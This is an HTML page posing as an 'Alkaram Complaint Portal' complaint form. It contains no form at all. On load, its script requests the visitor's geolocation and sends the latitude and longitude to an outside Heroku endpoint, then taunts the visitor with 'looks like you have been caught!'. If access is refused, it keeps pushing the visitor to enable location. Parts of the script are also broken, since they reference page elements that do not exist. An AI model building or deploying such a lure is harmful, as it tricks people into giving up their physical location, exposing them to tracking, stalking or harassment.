<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>Alkaram Complaint Portal</title>
    <style>
      body {
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
        margin: 0;
        background-color: #f5f5f5;
      }
      h1 {
        font-size: 48px;
        margin-bottom: 32px;
      }
      #continue-btn {
        background-color: #4CAF50;
        border: none;
        color: white;
        padding: 16px 32px;
        text-align: center;
        text-decoration: none;
        display: inline-block;
        font-size: 24px;
        border-radius: 8px;
        cursor: pointer;
        box-shadow: 0 2px 4px rgba(0, 0, 0, 0.5);
        transition: transform 0.2s ease-in-out;
      }
      #continue-btn:hover {
        transform: scale(1.1);
      }
    </style>
  </head>
  <body>
    <div>
      <h1>Complaint Form</h1>
      <button id="continue-btn" onclick="saveLocation()" style="display:none;">Click to continue</button>
    </div>
    <script>
      function saveLocation(position) {
        const lat = position.coords.latitude;
        const lon = position.coords.longitude;
        const url = `https://myportfolio1.herokuapp.com/api/save-location?latitude=${lat}&longitude=${lon}`;
        const xhr = new XMLHttpRequest();
        xhr.open("GET", url);
        xhr.onreadystatechange = function() {
          if (xhr.readyState === XMLHttpRequest.DONE) {
            if (xhr.status === 200 || xhr.status === 204) {
              alert("Hello Dear, looks like you have been caught!");
            } else {
              alert("Hello Dear, looks like you have been caught!");
            }
            document.getElementById("response-status").innerHTML = `API Response Status: ${xhr.status}`;
          }
        };
        xhr.send();
        document.getElementById("latitude").innerHTML = `Latitude: ${lat}`;
        document.getElementById("longitude").innerHTML = `Longitude: ${lon}`;
      }

      function getLocation() {
  const continueBtn = document.getElementById("continue-btn");
  if (navigator.geolocation) {
    navigator.geolocation.getCurrentPosition(saveLocation, function(error) {
      if (error.code == error.PERMISSION_DENIED) {
        continueBtn.innerHTML = "Please enable location and click to continue";
        continueBtn.style.display = "block";
        continueBtn.onclick = function() {
          getLocation();
        };
      }
    });
    continueBtn.style.display = "block";
  } else {
    alert("Geolocation is not supported by this browser.");
  }
}


      getLocation();
    </script>
  </body>
</html>
